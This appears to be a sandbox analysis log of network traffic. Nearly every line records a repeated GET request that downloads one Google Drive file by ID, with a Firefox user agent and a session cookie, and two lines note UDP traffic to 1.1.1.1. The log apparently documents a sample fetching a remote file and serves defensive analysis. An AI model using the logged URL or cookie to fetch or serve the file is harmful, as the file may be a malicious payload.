      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
